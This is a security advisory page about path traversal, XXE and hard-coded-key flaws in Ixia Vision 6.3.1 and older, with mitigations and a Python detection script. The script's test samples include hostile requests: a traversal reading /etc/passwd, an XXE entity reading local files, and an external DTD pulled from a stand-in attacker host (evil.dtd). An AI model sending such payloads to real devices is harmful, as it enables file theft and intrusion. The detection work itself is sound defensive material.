Keysight Ixia Vision Product Family (Update A)

Status: Monitor | CVSS 7.5 | ICS-CERT ICSA-25-063-02 | Mar 4, 2025
Attack path
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: None needed
Summary

Multiple vulnerabilities in the Keysight Ixia Vision Product Family (CWE-22 path traversal, CWE-611 XML external entity injection, CWE-321 use of a hard-coded cryptographic key) allow an unauthenticated attacker with network access to read sensitive data or execute arbitrary code. Affected: Ixia Vision 6.3.1 and older. The vendor has not released a patched version for these releases and recommends discontinuing use of the older software.

What this means
What could happen
An attacker with network access to the Ixia Vision management interface could read sensitive files from the device (including configuration and credential material) or execute arbitrary code, disrupting network testing and visibility operations or exfiltrating configuration details. Because Ixia Vision sits in the path of monitored traffic, a compromised device also gives the attacker a vantage point over whatever the packet broker is carrying.
Who's at risk
Network test and visibility equipment operators, particularly in telecom, enterprise networking, and industrial network monitoring roles. Ixia Vision is used for network performance testing, packet analysis, and traffic visibility in large deployments; compromise could disrupt network troubleshooting capabilities or expose sensitive test traffic.
How it could be exploited
An unauthenticated attacker on the network could send a crafted request to the Ixia Vision management interface (typically HTTP/HTTPS on ports 80/443, or a dedicated management port) that exploits a path traversal flaw (a file parameter containing "../" sequences, possibly percent-encoded) or an XML external entity flaw (an XML document whose DOCTYPE declares an entity pointing at a local file or a remote URL), gaining file read, outbound request capability, or code execution without credentials.
Prerequisites
  • Network access to the Ixia Vision management interface (typically port 80/443 or dedicated management port)
  • Device must be reachable from the attacker's network position
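The request shapes described above are easy to spot at a reverse proxy, IDS, or on a packet-broker span feeding the management interface. The following detection script is an added example written for this page; it is not code from OTPulse or Keysight, the endpoint paths (/download, /files, /import) are hypothetical rather than real Ixia Vision URLs, and the request samples are constructed. It percent-decodes request targets repeatedly (so double-encoded "%252e%252e" is caught), flags ".." only where it starts a path segment, and classifies XML bodies by whether their DOCTYPE declares an external entity, pulls an external DTD, or merely contains a DTD.

```python
"""Indicator scan for requests to a network-appliance management interface.

Added example for the Ixia Vision advisory. Endpoint paths and sample
requests below are constructed for illustration; they are not vendor data.
"""
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # enough to unwrap double- or triple-percent-encoding

# ".." that begins a path segment: preceded by start-of-string or a
# non-word, non-dot character ('/', '\\', '=', ...), followed by a separator
# or end-of-string. "release..notes.txt" does not match.
TRAVERSAL_RE = re.compile(r"(?<![\w.])\.\.(?=[\\/]|$)")

# DOCTYPE with an internal subset declaring a general or parameter entity
# that references an external resource (SYSTEM/PUBLIC): the classic XXE shape.
XXE_ENTITY_RE = re.compile(
    r"<!DOCTYPE[^>]*\[.*?<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b",
    re.I | re.S,
)
# DOCTYPE that loads an external DTD directly (out-of-band XXE variant).
XXE_EXTERNAL_DTD_RE = re.compile(r"<!DOCTYPE\s+\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)
# Any DTD at all: a management API has no business accepting one.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)

# Constructed samples: ids 2, 3, 5 and 6 carry indicators; 1, 4 and 7 are benign.
SAMPLE_REQUESTS = [
    {"id": 1, "method": "GET", "target": "/api/status", "body": ""},
    {"id": 2, "method": "GET",
     "target": "/download?file=..%2F..%2Fetc%2Fpasswd", "body": ""},
    {"id": 3, "method": "GET",
     "target": "/files/%252e%252e/%252e%252e/config", "body": ""},
    {"id": 4, "method": "GET", "target": "/docs/release..notes.txt", "body": ""},
    {"id": 5, "method": "POST", "target": "/import",
     "body": '<?xml version="1.0"?><!DOCTYPE cfg [<!ENTITY xxe SYSTEM '
             '"file:///etc/passwd">]><cfg>&xxe;</cfg>'},
    {"id": 6, "method": "POST", "target": "/import",
     "body": '<?xml version="1.0"?><!DOCTYPE cfg SYSTEM '
             '"http://203.0.113.7/evil.dtd"><cfg/>'},
    {"id": 7, "method": "POST", "target": "/import",
     "body": "<cfg><name>lab..test</name></cfg>"},
]


def fully_decode(value, rounds=MAX_DECODE_ROUNDS):
    """Percent-decode repeatedly until the string stops changing."""
    # Overlong UTF-8 encodings of '.' (%c0%ae) would otherwise decode to
    # U+FFFD and escape the traversal check; fold them to a plain dot first.
    value = re.sub(r"%c0%ae", ".", value, flags=re.I)
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(target):
    """True when the decoded request target contains a '..' path segment."""
    decoded = fully_decode(target).replace("\\", "/")
    return TRAVERSAL_RE.search(decoded) is not None


def xml_indicator(body):
    """Return the most severe XML indicator name in the body, or None."""
    if XXE_ENTITY_RE.search(body):
        return "xxe-external-entity"
    if XXE_EXTERNAL_DTD_RE.search(body):
        return "xxe-external-dtd"
    if DOCTYPE_RE.search(body):
        return "dtd-present"
    return None


def check_request(req):
    """Return the list of indicator names found in one request dict."""
    hits = []
    if has_traversal(req.get("target", "")):
        hits.append("path-traversal")
    xml_hit = xml_indicator(req.get("body", ""))
    if xml_hit:
        hits.append(xml_hit)
    return hits


def scan(requests):
    """Return (request id, indicator) pairs for every hit, in request order."""
    return [(r["id"], hit) for r in requests for hit in check_request(r)]


if __name__ == "__main__":
    for req_id, indicator in scan(SAMPLE_REQUESTS):
        print(f"request {req_id}: {indicator}")
```

Feed it records from whatever already sees the management traffic (a reverse-proxy access log with bodies enabled, a Zeek http.log, or an IDS alert export); the "dtd-present" class is worth alerting on too, since a legitimate client of a management API should never send a DOCTYPE.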
Tags: remotely exploitable, no authentication required, low complexity, high CVSS score (7.5), no patch available for current version
Exploitability
Some exploitation risk — EPSS score 6.5%
Affected products (1)
Product | Affected Versions | Fix Status
Ixia Vision Product Family | 6.3.1 and older | No fix (EOL)
Remediation & Mitigation
Do now
WORKAROUND: Restrict network access to the Ixia Vision device to trusted engineering and test subnets only; do not expose the management interface to untrusted networks or the Internet.
HARDENING: If remote access to Ixia Vision is required, route it through a VPN concentrator with strict authentication and encryption; do not allow direct Internet-facing access.
Schedule — requires maintenance window

Replacing or upgrading the device requires a reboot; plan for interruption of the monitoring and test traffic it carries.

HOTFIX: Discontinue use of Ixia Vision 6.3.1 and older versions; replace them with current software versions from Keysight if available.
HOTFIX: Contact Keysight support to confirm whether a patched version is available for your deployment; if no patch exists and the device is critical, plan for replacement.
Mitigations - no patch available
Ixia Vision Product Family 6.3.1 has reached End of Life. The vendor will not release a patch. Apply the following compensating control:
HARDENING: Isolate the Ixia Vision network segment from business networks and general IT infrastructure using a firewall or network access control list.
